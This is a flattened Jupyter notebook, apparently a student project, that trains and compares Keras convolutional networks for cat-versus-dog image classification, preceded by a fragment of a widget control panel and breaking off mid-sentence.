slider]) f = open('temp.msg','wb') f.write(str(1)) f.close() ###Output _____no_output_____ ###Markdown Arrows ###Code # icons are from "font-awesome" x_minus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-left') x_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-right') y_minus = widgets.Button( description='', disabled=False, button_style='', icon='arrow-up') y_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-down') xy_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)]) xy_cluster = widgets.VBox([ widgets.HBox([x_minus,x_plus]), widgets.HBox([y_minus, y_plus]) ]) z_minus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-up') z_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-down') z_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)]) z_cluster = widgets.VBox([ z_minus, z_plus]) widgets.HBox([xy_cluster, xy_slider, z_cluster, z_slider]) ###Output Widget Javascript not detected. It may not be installed properly. Did you enable the widgetsnbextension? If not, then run "jupyter nbextension enable --py --sys-prefix widgetsnbextension"
ProjectCatDog(2).ipynb
###Markdown We use keras to build our model, first let us import the package ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils ###Output C:\Users\HH\Anaconda3\lib\site-packages\h5py\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`. from ._conv import register_converters as _register_converters Using TensorFlow backend. ###Markdown Preparing the Data This function resizes the images to 64x64. And we use 25000 images of the data as train sample, 12500 images as test sample. I also separated cats and dogs for exploratory analysis. ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 64 COLS = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) ###Output Processed 0 of 25000 Processed 2500 of 25000 Processed 5000 of 25000 Processed 7500 of 25000 Processed 10000 of 25000 Processed 12500 of 25000 Processed 15000 of 25000 Processed 17500 of 25000 Processed 20000 of 25000 Processed 22500 of 25000 Processed 0 of 250 Train shape: (25000, 3, 64, 64) Test shape: (250, 3, 64, 64) ###Markdown Generating the Labels We're dealing with a binary classification problem here - (1) dog (0) cat. The lables can be created by looping over the file names in the train directory. It's nice to see the training data is perfectly balanced. ###Code labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1,3,64,64) test = test.reshape(-1,3,64,64) X_train = train.astype('float64') X_test = test.astype('float64') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) sns.countplot(labels) plt.title('Cats and Dogs') ###Output Training matrix shape (19999, 3, 64, 64) Testing matrix shape (250, 3, 64, 64) ###Markdown Checking out Cats and Dogs A quick side-by-side comparison of the animals. ###Code def show_cats_and_dogs(idx): cat = read_image(train_cats[idx]) dog = read_image(train_dogs[idx]) pair = np.concatenate((cat, dog), axis=1) plt.figure(figsize=(10,5)) plt.imshow(pair) plt.show() for idx in range(0,5): show_cats_and_dogs(idx) ###Output _____no_output_____ ###Markdown Build the model A scaled down version of the VGG-16, with a few notable changes. Number of convolution filters cut in half, fully connected (dense) layers scaled down. Set RMSprop as the optimizer. Set binary_crossentropy as the loss function. Set sigmoid as the activation function. ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.summary() ###Output C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:9: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), input_shape=(3, 64, 64..., activation="relu", padding="same")` if __name__ == '__main__': C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:10: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), activation="relu", padding="same")` # Remove the CWD from sys.path while we load stuff. C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:13: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")` del sys.path[0] C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:14: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:17: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:18: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:21: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:22: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")` ###Markdown Train Set the epoch number to be 8 and batch size 128 ###Code model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The final accuracy is 0.87 This result is not very well. Then we try to change some parameters to see the diffrerence Change the pixel of dataset Resizes the images to 32x32 and change the channels to be 1 ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train=labels X_valid = X_train[:5000,:,:,:] Y_valid = Y_train[:5000] X_train = X_train[5001:25000,:,:,:] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The train accuracy and test accuracy both lower Resizes the images to 256x256 and change the channels to be 3 ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras import backend as K from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils import os, cv2, random import numpy as np import pandas as pd TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 256 COLS = 256 ROWS2 = 64 COLS2 = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] # slice datasets for memory efficiency on Kaggle Kernels, delete if using full dataset train_images = train_dogs[:10000] + train_cats[:10000] random.shuffle(train_images) test_images = test_images[:250] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE b,g,r = cv2.split(img) img2 = cv2.merge([r,g,b]) return cv2.resize(img2, (ROWS2, COLS2), interpolation=cv2.INTER_CUBIC) def read_image2(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE b,g,r = cv2.split(img) img2 = cv2.merge([r,g,b]) return cv2.resize(img2, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS2, COLS2), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data def prep_data2(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image2(image_file) data[i] = image.T if i%100 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) test2 = prep_data2(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) sns.countplot(labels) from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Conv2D(32, 3, padding='same', input_shape=train.shape[1:], activation='relu')) model.add(Conv2D(32, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("First layer...") model.add(Conv2D(64, 3, padding='same', activation='relu')) model.add(Conv2D(64, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("Second layer...") model.add(Conv2D(128, 3, padding='same', activation='relu')) model.add(Conv2D(128, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("Third layer...") model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(2, 2))) #print("Flattening, etc...") model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) print("Compiling model...") model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model print("Creating model:") model = catdog() from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils epochs =4 batch_size = 128 ## Callback for loss logging per epoch class LossHistory(Callback): def on_train_begin(self, logs={}): self.losses = [] self.val_losses = [] def on_epoch_end(self, batch, logs={}): self.losses.append(logs.get('loss')) self.val_losses.append(logs.get('val_loss')) early_stopping = EarlyStopping(monitor='val_loss', patience=3, verbose=1, mode='auto') def run_catdog(): history = LossHistory() print("running model...") model.fit(train, labels, batch_size=batch_size, epochs=epochs, validation_split=0.25, verbose=2, shuffle=True, callbacks=[history, early_stopping]) print("making predictions on test set...") predictions = model.predict(test, verbose=0) return predictions, history predictions, history = run_catdog() loss = history.losses val_loss = history.val_losses plt.xlabel('Epochs') plt.ylabel('Loss') plt.title('VGG-16 Loss Trend') plt.plot(loss, 'blue', label='Training Loss') plt.plot(val_loss, 'green', label='Validation Loss') plt.xticks(range(0,epochs)[0::2]) plt.legend() plt.show() ###Output running model... Train on 15000 samples, validate on 5000 samples Epoch 1/4 - 155s - loss: 2.2850 - acc: 0.5029 - val_loss: 7.9552 - val_acc: 0.4658 Epoch 2/4 - 159s - loss: 7.8637 - acc: 0.5083 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 3/4 - 162s - loss: 8.1218 - acc: 0.4949 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 4/4 - 160s - loss: 8.0103 - acc: 0.5021 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 00004: early stopping making predictions on test set... ###Markdown The train accuracy and test accuracy both become much lower.So the best size should be 64*64. Change Activation Function Change Activation Function from 'relu' to 'sigmoid' A wide variety of sigmoid functions have been used as the activation function of artificial neurons, including the logistic and hyperbolic tangent functions. Sigmoid curves are also common in statistics as cumulative distribution functions (which go from 0 to 1), such as the integrals of the logistic distribution, the normal distribution, and Student's t probability density functions. So we want to try sigmoid function to increase the accuracy ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='sigmoid')) model.add(Dropout(0.5)) model.add(Dense(256, activation='sigmoid')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The accuracy is very low so we still use relu as activation function Change the loss function Change the loss function from 'binary_crossentropy' to 'mean_squared_error'. Mean squared error measures the average of the squares of the errors or deviations—that is, the difference between the estimator and what is estimated. MSE is a risk function, corresponding to the expected value of the squared error loss or quadratic loss. The difference occurs because of randomness or because the estimator doesn't account for information that could produce a more accurate estimate. ###Code optimizer = RMSprop(lr=1e-4) def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss='mean_squared_error', optimizer=optimizer) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown mean_squared_error is also not suitable binary_crossentropy means Logarithmic Loss, or simply Log Loss, is a classification loss function often used as an evaluation metric in kaggle competitions. Since success in these competitions hinges on effectively minimising the Log Loss, it makes sense to have some understanding of how this metric is calculated and how it should be interpreted. Our project is to do classfiction so binary_crossentropy should be the best choice Change the optimizer Change the optimizer from 'RMSprop' to 'adam' RMSprop is an unpublished, adaptive learning rate method proposed by Geoff Hinton in Lecture 6e of his Coursera Class.RMSprop and Adadelta have both been developed independently around the same time stemming from the need to resolve Adagrad's radically diminishing learning rates. Adaptive Moment Estimation (Adam) is another method that computes adaptive learning rates for each parameter. In addition to storing an exponentially decaying average of past squared gradients vt like Adadelta and RMSprop, Adam also keeps an exponentially decaying average of past gradients mt, similar to momentum. Whereas momentum can be seen as a ball running down a slope, Adam behaves like a heavy ball with friction, which thus prefers flat minima in the error surface. ###Code optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer='adam', metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown RMSprop is better than adam, so we will choose RMSprop in our best model Change the kernel initalizer Change the kernel_initializer as 'random_uniform' ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(64,kernel_initializer='random_uniform',bias_initializer='zeros')) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown We get a very low test accuracy Change the convolution filters number Reduce the convolution filters numbers and see the change ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR + i for i in os.listdir(TRAIN_DIR)] # use this for full dataset test_images = [TEST_DIR + i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i % 2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) def CatDog(): #Neural network model object model = Sequential() #First convolution model.add(Convolution2D( 16, 3, 3, border_mode = 'same', input_shape = (ROWS, COLS, CHANNELS), activation = 'relu' )) #First dimensionality reduction model.add( MaxPooling2D( pool_size = (2, 2) ) ) #Second convolution model.add(Convolution2D( 32, 3, 3, border_mode = 'same', activation = 'relu' )) #Second dimensionality reduction model.add( MaxPooling2D( pool_size = (2, 2) ) ) #Dimensionality reduction to single array model.add(Flatten()) #Dense layers - linear model on flattened array model.add(Dense(100, activation = 'relu')) #Prevent overfitting by randomly setting some model coeffecients to zero model.add(Dropout(0.5)) #More dense layers model.add(Dense(100, activation = 'relu')) #More overfitting prevention model.add(Dropout(0.5)) #Last dense layer model.add(Dense(1)) #Add output to model model.add(Activation('sigmoid')) #Compile model and return model.compile( loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'] ) return model model = CatDog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown We find the train accuracy is increased and convolution speed faster Increase the convolution filters numbers and see the change ###Code optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() nb_epoch = 4 batch_size = 128 model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_valid, Y_valid)) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The test accuracy is very low and the 